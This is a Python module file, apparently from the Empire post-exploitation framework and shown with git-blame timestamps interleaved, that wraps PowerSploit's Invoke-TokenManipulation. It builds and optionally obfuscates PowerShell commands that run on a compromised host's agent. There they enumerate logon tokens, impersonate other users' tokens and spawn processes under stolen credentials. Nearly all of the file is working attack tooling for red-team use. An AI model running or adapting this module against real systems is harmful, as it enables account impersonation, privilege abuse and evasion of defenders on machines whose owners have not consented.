2015-08-05 18:36:39 +00:00
|
|
|
from lib.common import helpers
|
|
|
|
|
|
|
|
class Module:
|
|
|
|
|
|
|
|
def __init__(self, mainMenu, params=[]):
|
|
|
|
|
|
|
|
self.info = {
|
|
|
|
'Name': 'Invoke-TokenManipulation',
|
|
|
|
|
|
|
|
'Author': ['@JosephBialek'],
|
|
|
|
|
|
|
|
'Description': ("Runs PowerSploit's Invoke-TokenManipulation to "
|
|
|
|
"enumerate Logon Tokens available and uses "
|
|
|
|
"them to create new processes. Similar to "
|
|
|
|
"Incognito's functionality. Note: if you select "
|
|
|
|
"ImpersonateUser or CreateProcess, you must specify "
|
|
|
|
"one of Username, ProcessID, Process, or ThreadId."),
|
|
|
|
|
|
|
|
'Background' : False,
|
|
|
|
|
|
|
|
'OutputExtension' : None,
|
|
|
|
|
2016-07-15 23:14:43 +00:00
|
|
|
'NeedsAdmin' : False,
|
2015-08-05 18:36:39 +00:00
|
|
|
|
|
|
|
'OpsecSafe' : True,
|
|
|
|
|
2016-09-23 18:04:35 +00:00
|
|
|
'Language' : 'powershell',
|
|
|
|
|
|
|
|
'MinLanguageVersion' : '2',
|
2015-08-05 18:36:39 +00:00
|
|
|
|
|
|
|
'Comments': [
|
|
|
|
'http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/'
|
|
|
|
]
|
|
|
|
}
|
|
|
|
|
|
|
|
# any options needed by the module, settable during runtime
|
|
|
|
self.options = {
|
|
|
|
# format:
|
|
|
|
# value_name : {description, required, default_value}
|
|
|
|
'Agent' : {
|
|
|
|
'Description' : 'Agent to run module on.',
|
|
|
|
'Required' : True,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'RevToSelf' : {
|
|
|
|
'Description' : 'Switch. Revert to original token.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'ShowAll' : {
|
|
|
|
'Description' : 'Switch. Enumerate all tokens.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'ImpersonateUser' : {
|
|
|
|
'Description' : 'Switch. Will impersonate an alternate users logon token in the PowerShell thread.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'CreateProcess' : {
|
|
|
|
'Description' : 'Specify a process to create instead of impersonating the user.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'WhoAmI' : {
|
|
|
|
'Description' : 'Switch. Displays current credentials.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'Username' : {
|
|
|
|
'Description' : 'Username to impersonate token of.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'ProcessID' : {
|
|
|
|
'Description' : 'ProcessID to impersonate token of.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'Process' : {
|
|
|
|
'Description' : 'Process name to impersonate token of.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'ThreadId' : {
|
|
|
|
'Description' : 'Thread to impersonate token of.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'ProcessArgs' : {
|
|
|
|
'Description' : 'Arguments for a spawned process.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
},
|
|
|
|
'NoUI' : {
|
|
|
|
'Description' : 'Switch. Use if creating a process which doesn\'t need a UI.',
|
|
|
|
'Required' : False,
|
|
|
|
'Value' : ''
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
# save off a copy of the mainMenu object to access external functionality
|
|
|
|
# like listeners/agent handlers/etc.
|
|
|
|
self.mainMenu = mainMenu
|
|
|
|
|
|
|
|
for param in params:
|
|
|
|
# parameter format is [Name, Value]
|
|
|
|
option, value = param
|
|
|
|
if option in self.options:
|
|
|
|
self.options[option]['Value'] = value
|
|
|
|
|
|
|
|
|
2017-03-11 23:35:17 +00:00
|
|
|
def generate(self, obfuscate=False, obfuscationCommand=""):
|
2015-08-05 18:36:39 +00:00
|
|
|
|
|
|
|
# read in the common module source code
|
|
|
|
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-TokenManipulation.ps1"
|
2017-03-11 23:35:17 +00:00
|
|
|
if obfuscate:
|
|
|
|
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
|
|
|
|
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
|
2015-08-05 18:36:39 +00:00
|
|
|
try:
|
|
|
|
f = open(moduleSource, 'r')
|
|
|
|
except:
|
|
|
|
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
|
|
|
|
return ""
|
|
|
|
|
|
|
|
moduleCode = f.read()
|
|
|
|
f.close()
|
|
|
|
|
|
|
|
script = moduleCode
|
|
|
|
|
2017-03-11 23:35:17 +00:00
|
|
|
scriptEnd = "Invoke-TokenManipulation"
|
2015-08-05 18:36:39 +00:00
|
|
|
|
|
|
|
if self.options['RevToSelf']['Value'].lower() == "true":
|
2017-03-11 23:35:17 +00:00
|
|
|
scriptEnd += " -RevToSelf"
|
2015-08-05 18:36:39 +00:00
|
|
|
elif self.options['WhoAmI']['Value'].lower() == "true":
|
2017-03-11 23:35:17 +00:00
|
|
|
scriptEnd += " -WhoAmI"
|
2016-03-12 00:31:27 +00:00
|
|
|
elif self.options['ShowAll']['Value'].lower() == "true":
|
2017-03-11 23:35:17 +00:00
|
|
|
scriptEnd += " -ShowAll | Out-String"
|
2015-08-05 18:36:39 +00:00
|
|
|
else:
|
|
|
|
|
|
|
|
for option,values in self.options.iteritems():
|
|
|
|
if option.lower() != "agent":
|
|
|
|
if values['Value'] and values['Value'] != '':
|
|
|
|
if values['Value'].lower() == "true":
|
|
|
|
# if we're just adding a switch
|
2017-03-11 23:35:17 +00:00
|
|
|
scriptEnd += " -" + str(option)
|
2015-08-05 18:36:39 +00:00
|
|
|
else:
|
2017-03-11 23:35:17 +00:00
|
|
|
scriptEnd += " -" + str(option) + " " + str(values['Value'])
|
2015-08-05 18:36:39 +00:00
|
|
|
|
|
|
|
# try to make the output look nice
|
|
|
|
if script.endswith("Invoke-TokenManipulation") or script.endswith("-ShowAll"):
|
2017-03-11 23:35:17 +00:00
|
|
|
scriptEnd += "| Select-Object Domain, Username, ProcessId, IsElevated, TokenType | ft -autosize | Out-String"
|
2015-08-05 18:36:39 +00:00
|
|
|
else:
|
2017-03-11 23:35:17 +00:00
|
|
|
scriptEnd += "| Out-String"
|
2015-08-05 18:36:39 +00:00
|
|
|
if self.options['RevToSelf']['Value'].lower() != "true":
|
2017-03-11 23:35:17 +00:00
|
|
|
scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
|
|
|
|
if obfuscate:
|
2017-04-23 01:17:28 +00:00
|
|
|
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
|
2017-03-11 23:35:17 +00:00
|
|
|
script += scriptEnd
|
2015-08-05 18:36:39 +00:00
|
|
|
return script
|